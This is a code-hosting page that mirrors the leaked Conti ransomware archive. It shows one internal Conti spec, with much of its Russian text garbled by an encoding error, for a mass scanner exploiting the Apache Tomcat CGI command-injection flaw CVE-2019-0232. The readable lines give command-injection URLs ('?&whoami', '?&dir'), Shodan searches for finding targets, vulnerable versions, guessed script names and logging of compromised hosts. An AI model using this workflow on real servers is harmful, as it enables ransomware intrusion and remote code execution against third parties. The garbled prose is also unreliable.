archive
/
conti
mirror of https://github.com/MalwareLeaks/Conti-Ransomware-Source-Full
2
0
Fork 0
Code Issues Projects Releases Wiki Activity
Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
4 Commits
1 Branch
0 Tags
113 MiB
Tree: cc8163d381
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'cc8163d381'
${ noResults }
conti/Conti Documentation Leak/docs/modules/сканер apache tomcat.txt

108 lines
4.1 KiB
Raw Normal View History

Add files via upload
3 years ago
  1. ������ ���������� APACHE TOMCAT/CGI-BIN (CVE-2019-0232)
  2. ����������� �������
  5. ����
  7. ���������� ����������� ������ ������� � ����������� CVE-2019-0232.
  10. EXPLOIT
  12. ���� ��������� - � ������������ ������������� ��������� ������ ������� cgi-bin ������� Apache Tomcat.
  13. ��-�� ����� �������� ��������� ���������� ����.
  14. ���� ���� ������ ����
  16. http://localhost/cgi-bin/hello.bat?&whoami
  18. �� � ���������� ���������� cmd.exe /c "whoami"
  20. ����������� ������� �� �������:
  21. https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
  22. https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/
  25. ����������
  27. � �������� ��������� ������������ ����� ������������ ������ https://www.shodan.io/search?query=apache+tomcat
  28. ��� ������� � shodan.io ����� ������. �� �� ���� ��� ��������� ���� ��� ���������� ��� ������ � ����.
  29. ����� �������������� ���������� ������ ������ � ������� .csv � ��������� �� �������� � ���� ����� �������.
  31. ����������� ������������ �������� ������ ������� � ������:
  32. - URL ��������� ������� (http://domain.com/cgi-bin/script.bat?&dir ��������)
  33. - ������ HTTP-����� �� ������, ������� ��� HTTP-��������� � ���� ������
  34. - URL whoami-������� (http://domain.com/cgi-bin/script.bat?&whoami)
  35. - ������ HTTP-����� �� ������ whoami (��.����), ������� ��� HTTP-��������� � ���� ������
  37. �������� ������������ ���������:
  38. 1. ������ ����� shodan.io �� ������ ������, �������� ��������. �������� �� ������ ����� ������.
  39. ���� �������� �� .csv ��� .json-�����, ����������������� � ������� (��� ������� ������ �� �������).
  40. 2. ����� ��������� ����� � ������ �������.
  41. 3. ���� � ���������� ���� ������ ���������� ��, ���������� ��� ��� ������ 7.0.94, 8.5.40 � 9.0.19 �������������.
  42. ���� ������ ������ ��� �����, ���������� �����, ��������� � ����������.
  43. ���� ������ ������ ��� �����������, ����������.
  44. 4. ������ �������
  46. http://domain.com/cgi-bin/hello.bat?&dir
  47. http://domain.com/cgi-bin/hello.bat?&dir
  48. http://domain.com/cgi-bin/test.bat?&dir
  49. http://domain.com/cgi-bin/info.bat?&dir
  50. http://domain.com/cgi-bin/0.bat?&dir
  51. http://domain.com/cgi-bin/1.bat?&dir
  53. ������� ����������, ���� ���� �� ��������� ��� �������� ��������, ���� ���� �� ������� ������ ��� �����.
  54. ��� ����� ������, �������� ������ ����������� - ��� ����� ����� ������ � ������ � ���������, � �������� ���������.
  56. �������� �������� ��� �����:
  58. hello.bat
  59. helloworld.bat
  60. test.bat
  61. index.bat
  62. info.bat
  63. sysinfo.bat
  64. run.bat
  65. tomcat.bat
  66. 0.bat
  67. 1.bat
  68. 2.bat
  69. ...
  70. 10.bat
  72. ����� ����, ��� ������� ����� ������� ����� ��������� ����� �� 0 �� 9 � ��� �����.
  73. �� ����, ��� ����� hello.bat �� ��������� ��������� ��������:
  74. hello.bat
  75. hello0.bat
  76. hello1.bat
  77. ..
  78. hello9.bat
  80. �����: ���������� ������ ���������� �������� ��� ������� ����� �������!
  81. https://www.exploit-db.com/exploits/47073
  82. �����: ������ ��� ��� ��� ������� �������� �����, �.�. �� ������ �� ����� ���� �� �����.
  84. 4. ���� ��� ������� ��� 200 � �����, ������� ���������������� ����� �� ������� ����������:
  85. - ��� ������� dir � ������ ������ ���� ���������� ��������
  86. mm.dd.YYYY HH:mm <DIR> .
  87. mm.dd.YYYY HH:mm <DIR> ..
  89. ���� ���� ������� ������������ � ������:
  90. - ������ ������ http://domain.com/cgi-bin/<script>.bat?&whoami
  91. (����� script - ��� ���� �������, ��� �������� ������� �������� ����� 200 � ������� ���������)
  92. - ��������� � �������������� ������ ������� � ������.
  95. ������ ������ ���� �������� ��������� �������:
  96. * ��� ����� ���� ������ �� ���������������� ���������� ����� (��������, python ��� PowerShell)
  97. * ������ ������ ����� ��� � ������� ��������, � ������ $(script).log, ��� $(script) - ��� ��� ���������� �������
  98. * ��� ������ ����� ������� ����-������� �� ������ �������
  99. * ����������� ����� ���� ������� � ����������� - ������������� ������ ��������� ������
  100. * � ��� ����� ��������� ��������� �������:
  101. - ����� ���������, � �� �������
  102. - ����������� ������ � �����������:
  103. - �����
  104. - ������ �����
  105. - ������ HTTP-������� � ������
  106. ������ � ����� (��� ������� - �������� ������) �������� ����������:
  107. - % ������� ��������������, % �������� ������� �������
  108. - ��� ����������� ����������� ����� ���������� ������ HTTP-������ � ����� (���� ���� �� ��� ��� ������).